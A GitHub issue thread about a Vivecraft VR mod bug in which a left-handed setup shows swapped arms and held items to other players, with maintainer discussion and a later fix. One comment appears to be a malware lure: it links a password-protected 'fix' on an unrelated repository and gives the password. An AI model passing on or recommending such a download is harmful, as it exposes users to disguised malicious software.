### ISSUE TITLE
Left hand setup in multiplayer swaps left and right arms (and held items) for others looking at the left handed player

### ISSUE THREAD

**Issue by treyo-dev** [ferriarnus/VivecraftForge#296]
If you have the Skin Customization set to Main Hand: left and the VR Controller Reverse Hands set to On, then in a LAN game a player looking at the left handed VR player will see his arms (and held items) as swapped, with the left arm on the right side and the right arm on the left side.

This occurs in Minecraft 1.21 with the vivecraft-1.21-1.1.11-b2-fabric.jar.

Here's a video clip showing the issue.

https://github.com/user-attachments/assets/c667feff-08e4-4352-91c2-3d00be4f9287

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fayer3** [comment]
yeah, the vanilla main hand option currently isn't well supported

**Comment by treyo-dev** [comment]
I went ahead and checked out the code and made a fix for this
- https://github.com/Vivecraft/VivecraftMod/compare/Multiloader-1.21...treyo-dev:VivecraftMod:Multiloader-1.21

Do you have rules or guidelines around the handling of pull requests?

**Comment by fayer3** [comment]
don't think that is really the right way of solving that
the issues is in more places than just that, and what you did doesn't fix the root cause I think
the issue wit hthe skin main hand is 2 fold
- we don't check it client side at all, the item is always inthe right hand (left hand with reversed hands)
- reversed hands doesn't flip the item transforms for 3rd person

**Comment by treyo-dev** [comment]
You're absolutely right. My fix is definitely more of a hack and not fixing the root problem. 

You're welcome to the change if you want it, but I completely understand holding off for a more proper fix.

Maybe at some point I'll try taking a deeper look, but I don't have the time to do so at this current moment in time. So I'll just plan on leaving it at that for now.

Thanks.

**Comment by fayer3** [comment]
fixed in 1.2.0
